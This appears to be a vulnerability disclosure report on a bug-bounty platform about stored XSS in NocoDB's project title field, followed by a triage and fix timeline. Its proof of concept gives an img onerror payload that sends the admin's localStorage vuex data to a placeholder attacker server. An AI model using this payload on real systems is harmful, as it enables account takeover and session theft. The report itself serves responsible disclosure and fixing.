Account takeover due to stored XSS in "Project Title" in nocodb/nocodb

Valid

Reported on

Jun 3rd 2022


Description

The project "Title" field in the NocoDB application is vulnerable to stored XSS, which can lead to takeover of the admin account.

Proof of Concept

Log in as a low-privileged user, click "New Project", then click "Create".

Enter the payload <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")> as the project title and click "Create" again. (hacker_server:port is a placeholder for an attacker-controlled listener.)

Then log in from the super admin account and "delete" the created project <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")>. When the unescaped title is rendered in the admin's browser, the payload fires and sends the admin's persisted vuex store from localStorage to the attacker's server.

PoC video

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Impact

An attacker can take over any user's account, including the super admin's.

We are processing your report and will contact the nocodb team within 24 hours. a year ago
Raj modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Raj
a year ago

Researcher


Hello @admin, the maintainer has provided the email ID, so can you please invite them to this report?

We have contacted a member of the nocodb team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


Sorted 👍

Raj modified the report
a year ago
Raj modified the report
a year ago
Raj
a year ago

Researcher


@admin Please send them the updated report.

Raj
a year ago

Researcher


@admin here is the PoC video: https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Raj
a year ago

Researcher


@admin here is the PoC video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

of account takeover.

navi validated this vulnerability a year ago
Raj has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
navi marked this as fixed in Will be shipped in > 0.91.7 with commit ffad5a a year ago
navi has been awarded the fix bounty
This vulnerability will not receive a CVE
Raj
a year ago

Researcher


@admin The fix is deployed, so can you please assign the CVE?

Jamie Slome
a year ago

Admin


The CVE has been assigned and should be published soon 👍
